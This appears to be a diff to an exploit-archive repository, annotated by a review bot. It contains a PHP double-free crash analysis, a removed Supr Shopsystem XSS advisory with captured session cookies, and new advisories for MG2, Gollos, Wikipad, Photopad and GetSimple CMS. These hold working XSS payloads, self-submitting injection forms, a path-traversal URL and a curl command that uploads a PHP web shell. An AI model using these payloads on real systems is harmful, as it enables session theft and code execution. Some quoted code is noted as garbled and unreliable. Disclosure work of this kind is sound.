php5ts!_zval_dtor_func+0x7f [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_variables.c @ 36]:
0f0b1ccf 897148 mov dword ptr [ecx+48h],esi
0f0b1cd2 01574c add dword ptr [edi+4Ch],edx
0f0b1cd5 a148456a0f mov eax,dword ptr [php5ts!zend_unblock_interruptions (0f6a4548)]
0f0b1cda 85c0 test eax,eax
0f0b1cdc 0f8591010000 jne php5ts!_zval_dtor_func+0x223 (0f0b1e73)
0f0b1ce2 5f pop edi
0f0b1ce3 5e pop esi
0f0b1ce4 c3 ret
0:000> ?esi+8
Evaluate expression: 51114464 = 030bf1e0
0:000> dc esi+8
030bf1e0 030bf1d8 41414141 00000000 00000000 ....AAAA........
030bf1f0 00000011 00000019 61636f6c 0300656c ........locale..
030bf200 00000011 00000011 6e697270 00725f74 ........print_r.
030bf210 00000109 00000011 030bf320 030bf210 ........ .......
030bf220 01790494 00000000 00000000 00000000 ..y.............
030bf230 00000000 00000000 00000000 00000000 ................
030bf240 00000000 00000000 00000000 00000000 ................
030bf250 00000000 00000000 00000000 00000000 ................
The outcome of the double free depends on the arrangement of the heap. A simple script that produces a variety of read access violations is shown in figure 5, and another that reliably produces data execution prevention access violations is provided in figure 6.
Figure 5. A script that produces a variety of AVs.
<?php
Locale::parseLocale("x-AAAAAA");
$foo = new SplTempFileObject();
?>
Figure 6. A script that reliably produces DEPAVs.
<?php
Locale::parseLocale("x-7-644T-42-1Q-7346A896-656s-75nKaOG");
$pe = new SQLite3($pe, new PDOException(($pe->{new ReflectionParameter(TRUE, new RecursiveTreeIterator((null > ($pe+=new RecursiveCallbackFilterIterator((object)$G16 = new Directory(), DatePeriod::__set_state()))), (array)$h453 = new ReflectionMethod(($pe[TRUE]), $G16->rewind((array)"mymqaodaokubaf")), ($h453->getShortName() === null), ($I68TB = new InvalidArgumentException($H03 = new DOMStringList(), null, (string)MessageFormatter::create($sC = new AppendIterator(), new DOMUserDataHandler())) & null)))}), ($h453[(bool)DateInterval::__set_state()]), new PDOStatement()), TRUE);
$H03->item((unset)$gn = new SplStack());
$sC->valid();
?>
To fix the vulnerability, get_icu_value_internal should be modified to return a copy of loc_name rather than loc_name itself. This can be done easily using the estrdup function. The single line fix is shown in figures 7 and 8.
Figure 7. The original code.
if( strcmp(tag_name , LOC_LANG_TAG)==0 ){
if( strlen(loc_name)>1 && (isIDPrefix(loc_name) ==1 ) ){
return (char *)loc_name;
}
}
Figure 8. The fixed code.
if( strcmp(tag_name , LOC_LANG_TAG)==0 ){
if( strlen(loc_name)>1 && (isIDPrefix(loc_name) ==1 ) ){
return estrdup(loc_name);
}
}
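Review bot: the fix in Figure 8 is the right shape, but the writeup should state what it implies for callers: with estrdup every caller of get_icu_value_internal must efree the result, which the first paragraph says they already do by contract, so no caller changes are needed; say so explicitly so a reader does not assume a leak-versus-double-free trade-off is still open. Two accuracy points: the text says the early return happens when "fromParseLocal is true", but the Figure 7 excerpt shows no such guard, only the LOC_LANG_TAG comparison and the isIDPrefix check, so either the excerpt is missing the enclosing condition or the parameter name and guard should be checked against the source; and the Figure 6 script is a fuzzer-produced heap groom whose only shown effect is a DEP access violation, so the RCE claim in the first paragraph should stay qualified as potential, as the CSV's dos classification already does. Minor: "then the pointer passed via loc_name is freed again elsewhere, a double free occurs" needs "and" before "a double free".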

@ -1,260 +0,0 @@
Document Title:
===============
Supr Shopsystem v5.1.0 - Persistent UI Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1353
Release Date:
=============
2014-11-07
Vulnerability Laboratory ID (VL-ID):
====================================
1353
Common Vulnerability Scoring System:
====================================
3.1
Product & Service Introduction:
===============================
SUPR is a modern and user-friendly system which allows each store very quickly and easily create their own online store.
Without installation and own webspace you can begin to create products and content right after the registration. With our
free designs and the great customization options you can customize and adapt to your ideas your shop. You have to be an
expert to work with the SUPR Shop.
( Copy of the Vendor Homepage: http://de.supr.com/tour )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official Supr Shopsystem v5.1.0 web-application.
Vulnerability Disclosure Timeline:
==================================
2014-11-05: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Supreme NewMedia GmbH
Product: Supr - Shopsystem Web Application 5.1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official Supr Shopsystem v5.1.0 web-application.
The vulnerability can be exploited by remote attackers to execute persistent codes with forced client-side browser requests through a non
expired session or by local post inject.
The vulnerability is located in the blogname, shop slogan and tags input fields of the Dashboard > Settings > General > (setting_shopdetail) module.
Remote attackers are able to prepare client-side requests with malicious context to take over administrator accounts on interaction (click link).
Local attackers with privileged user accounts are also able to inject own script codes locally by manipulation of the vulnerable setting_shopdetail
POST method request. The execution of the code occurs above to the error exception-handling that should prevent but got evaded.
The error class with the exception will be evaded because of the request that went through and executes earlier then the exception prevents the execute.
Remote attackers are able to prepare a post request that allows to execute the code in one shot through the same origin policy. The request can be injected
locally to reproduce or as prepare POST request that manipulates the values when a non expired session clicks for example a manipulated link.
The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2.
Exploitation of the application-side web vulnerability requires a low privileged web-application user account and low user interaction.
Successful exploitation of the vulnerabilities result in persistent phishing mails, session hijacking, persistent external redirect to malicious
sources and application-side manipulation of affected or connected module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Dashboard > Settings > General > (setting_shopdetail)
Vulnerable Parameter(s):
[+] blogname
[+] blog/shop slogan
[+] tags
Affected Module(s):
[+] Dashboard (localhost:80/a/wp-admin/[x])
Proof of Concept (PoC):
=======================
The application-side vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction click.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: Dashboard > Settings > General > (setting_shopdetail)
<form id="setting_shopdetail" name="setting_shopdetail" method="post" action="">
<div class="form-row field-error">
<div class="label">
<label for="setting_shopdata_blogname" class="mandatory">Shopname</label>
</div>
<div class="field">
<input id="setting_shopdata_blogname" name="setting_shopdata[blogname]" value="" type="text"><[PERSISTENT INJECTED SCRIPT CODE!];)" <"="">
<!-- <pre></pre> -->
<ul class="">
<li class="error">Das Feld <strong>Shopname</strong> enthält leider ungültige Zeichen!</li>
</ul></div>
Note: The error class with the exception will be evaded because of the request that went through and executes earlier then the exception prevents the execute.
Remote attackers are able to prepare a post request that allows to execute the code in one shot through the same origin policy. The request can be injected
locally to reproduce or as prepare POST request that manipulates the values when a non expired session clicks for example a manipulated link.
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; __utma=182188197.576119580.1414780466.1414783994.1414786850.3;
__utmc=182188197; __utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ugqds8368sctjctkj1ldv34pu1;
wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47;
wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
_ga=GA1.2.576119580.1414780466; _pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; __utma=1.576119580.1414780466.1414786842.1414786842.1;
__utmb=1.4.10.1414786842; __utmc=1; __utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; wp-settings-time-29002=1414787115;
__utmb=182188197.24.10.1414786850]
Connection[keep-alive]
Cache-Control[max-age=0]
POST-Daten:
setting_shopdata%5Bblogname%5D[%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!]%28%22VL%22%29+%3C]
setting_shopdata%5Bblogdescription%5D[Shop+Slogan+%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
shopreg%5Bshoplang%5D[de_DE]
setting_shopdata%5Bshoplang%5D[de_DE]
setting_shopdata%5Bshopcategory%5D[]
setting_shopdata%5Bshopdesc%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
setting_shopdata%5Bshoptags%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
setting_shopdata%5Bemailfooter%5D[]
setting_shopdata%5Binvoicenote%5D[]
setting_shopdata%5Bshop_google_analytics_account%5D[]
setting_shopdata%5Bshop_google_webmastertools_verification_code%5D[]
setting_shopdata%5Bsubmit%5D[save]
Response Header:
Date[Fri, 31 Oct 2014 20:25:22 GMT]
Server[Apache/2.2.16 (Debian)]
X-Powered-By[PHP/5.3.3-7+squeeze22]
p3p[CP="CAO PSA OUR"]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0, no-cache]
Set-Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1
wp-settings-29002=deleted; expires=Thu, 31-Oct-2013 20:25:22 GMT; path=/
wp-settings-time-29002=1414787123; expires=Sat, 31-Oct-2015 20:25:23 GMT; path=/]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
Connection[close]
Content-Type[text/html; charset=UTF-8]
--
Status: 200[OK]
GET https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[PERSISTENT INJECTED SCRIPT CODE!]
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[283] Mime Type[text/html]
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; __utma=182188197.576119580.1414780466.1414783994.1414786850.3;
__utmc=182188197; __utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ugqds8368sctjctkj1ldv34pu1;
wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47;
wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
_ga=GA1.2.576119580.1414780466; _pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; __utma=1.576119580.1414780466.1414786842.1414786842.1;
__utmb=1.4.10.1414786842; __utmc=1; __utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; wp-settings-time-29002=1414787123; __utmb=182188197.24.10.1414786850]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Date[Fri, 31 Oct 2014 20:25:24 GMT]
Server[Apache/2.2.16 (Debian)]
Content-Length[283]
Keep-Alive[timeout=5, max=8]
Connection[Keep-Alive]
Content-Type[text/html; charset=iso-8859-1]
Reference(s):
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[x]
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable setting_shopdetail values in the input POST method request.
Restrict the input fields of the tags, blogname and blog slogan to prevent persistent script code injection attacks.
Setup the error exception above to the input mask and reconfigure it to capture the events correctly.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the shopsystem is estimated as medium. (CVSS 3.1)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com
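Review bot: this hunk deletes the whole 35321.txt advisory and adds nothing in its place, so the commit must also drop the matching id row from the index, otherwise the entry would point at a file that no longer exists. For the record, the removed text contradicted itself on severity (CVSS 3.1 in the header and in Security Risk, 3.2 in Technical Details) and its Release Date (2014-11-07) was later than its Public Disclosure entry (2014-11-05), which is worth noting in the commit message as the state of the file at removal.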

platforms/php/webapps/35348.txt Executable file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/46378/info
MG2 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
MG2 0.5.1 is vulnerable; other versions may also be affected.
http://www.example.com/mg2/skins/rounded/templates/thumbnails_password.php
- param(GET): list=25<script>alert(1)</script>
- param(GET): id=25<script>alert(1)</script>
http://www.example.com/mg2/skins/rounded/templates/viewimage_comments.php
- param(GET): id=31<script>alert(1)</script>
http://www.example.com/mg2/skins/admin/admin1_menu.php
- param(GET): list=41<script>alert(1)</script>
http://www.example.com/mg2/skins/admin/admin2_comments.php
- param(GET): list=45<script>alert(1)</script>
http://www.example.com/mg2/skins/admin/admin2_edit.php
- param(GET): editID=53<script>alert(1)</script>
http://www.example.com/mg2/skins/admin/admin2_newfolder.php
- param(GET): list=59<script>alert(1)</script>
http://www.example.com/mg2/skins/admin/admin3_folders.php
- param(GET): list=71<script>alert(1)</script>
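Review bot: the file header marks `platforms/php/webapps/35348.txt` as an Executable file, and the same applies to the other .txt advisories added in this commit; these are plain-text notes, so the mode bit should be dropped (100644) before merging. The content itself is consistent: each of the seven URLs names the script and the reflected GET parameter, and the first line keeps the SecurityFocus source, which is what the index row needs.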

platforms/php/webapps/35349.txt Executable file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/46379/info
Gollos is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Gollos 2.8 is vulnerable; other versions may also be affected.
http://www.example.com/?returnurl="><script>alert(document.cookie)</script>
http://www.example.com/register.aspx?returnurl="><script>alert(document.cookie)</script>
http://www.example.com/publication/info.aspx?pt=1&returnurl="><script>alert(document.cookie)</script>
http://www.example.com/user/add.aspx?returnurl="><script>alert(document.cookie)</script>user/add.aspx
http://www.example.com/product/list.aspx?q=1"><script>alert(document.cookie)</script>&x=0&y=0
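Review bot: every path in this entry is `.aspx` (register.aspx, publication/info.aspx, user/add.aspx, product/list.aspx), which is ASP.NET, yet the file is placed under `platforms/php/webapps/`; the platform should be corrected in both the path and the index row so that searches by platform find it. Also, the fourth URL repeats `user/add.aspx` after the closing `</script>`, which looks like a copy artifact from the source page rather than part of the reported parameter.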

platforms/php/webapps/35350.txt Executable file

@ -0,0 +1,26 @@
source: http://www.securityfocus.com/bid/46383/info
Wikipad is prone to a cross-site scripting vulnerability, an HTML-injection vulnerability, and an information-disclosure vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and obtain sensitive information.
Wikipad 1.6.0 is vulnerable; other versions may also be affected.
Information-disclosure:
http://www.example.com/pages.php?id=./../../../../../txt_file
Cross-site scripting:
http://www.example.com/pages.php?id=index"><script>alert(document.cookie)</script>
http://www.example.com/pages.php?action=edit&id=27-01-2011"><script>alert(document.cookie)</script>
HTML-injection:
<form action="http://host/pages.php?action=edit&id=index&title=index" method="post" name="main">
<input type="hidden" name="data[text]" value=&#039;text"><script>alert(document.cookie)</script>&#039;>
</form>
<script>
document.main.submit();
</script>
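Review bot: the form in the HTML-injection section has its attribute quotes HTML-encoded (`value=&#039;text"...&#039;`), which is residue from the SecurityFocus page; as pasted the attribute value is not delimited, so the entities should be decoded back to `'` before this lands. The same entity residue appears in the 35351 and 35353 entries in this commit. The three sections here are labelled by vulnerability class (Information-disclosure, Cross-site scripting, HTML-injection), which matches the summary line and is the layout the other entries should follow.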

platforms/php/webapps/35351.txt Executable file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/46385/info
Photopad is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Photopad 1.2.0 is vulnerable; other versions may also be affected.
1. http://host/files.php?action=edit&id=999"><script>alert(document.cookie)</script>
2. http://host/gallery.php?action=view&id=999"><script>alert(document.cookie)</script>
3. <form action="http://host/files.php?action=edit&id=2" method="post" name="main">
<input type="hidden" name="data[title]" value=&#039;title"><script>alert(document.cookie)</script>&#039;>
<input type="hidden" name="data[tags]" value=&#039;tag&#039;>
</form>
<script>
document.main.submit();
</script>
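Review bot: the three numbered PoCs mix reflected GET cases (items 1 and 2, the `id` parameter) with a self-submitting POST form (item 3, `data[title]`), but the file has no per-item labels, so it reads as three variants of one issue; add a short label per item so the summary ("multiple cross-site scripting vulnerabilities") can be matched to the scripts and parameters affected.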

platforms/php/webapps/35353.txt Executable file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/46427/info
GetSimple CMS is prone to an arbitrary-file-upload vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
GetSimple CMS 2.03 is vulnerable; other versions may also be affected.
Bug Code:
getsimple/admin/upload-ajax.php
if ($_REQUEST[&#039;sessionHash&#039;] === $SESSIONHASH) {
if (!empty($_FILES))
{
$tempFile = $_FILES[&#039;Filedata&#039;][&#039;tmp_name&#039;];
$name = clean_img_name($_FILES[&#039;Filedata&#039;][&#039;name&#039;]);
$targetPath = GSDATAUPLOADPATH;
$targetFile = str_replace(//,&#039;/,$targetPath) . $name;
move_uploaded_file($tempFile, $targetFile);
----------------------------------------------------------------------
Generating SESSIONHASH: md5( $salt. $sitename)
[XPL]
curl -F “Filedata=@yourshell.txt;filename=shell.php”
http://getsimple_localhost/admin/upload-ajax.php\?sessionHash\=HASH CREATO
After, enjoy your Bacon-Shell here ...http://getsimple_localhost/
data/uploads/shell.php
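Review bot: the Bug Code excerpt is garbled beyond the `&#039;` entity residue: `str_replace(//,&#039;/,$targetPath)` has lost its string quotes and is not valid PHP, the curl line carries typographic quotes and a line break from the source page, and `HASH CREATO` is an untranslated placeholder; re-paste the excerpt from the source as plain ASCII so the quoted code matches the file it cites. Even as shown, the excerpt supports the summary: the only gate visible in `upload-ajax.php` is `sessionHash === $SESSIONHASH` (derived from `md5($salt.$sitename)`), and the name goes through `clean_img_name()` straight into `move_uploaded_file()` with no file-type check in view, which is the check a fix would need to add.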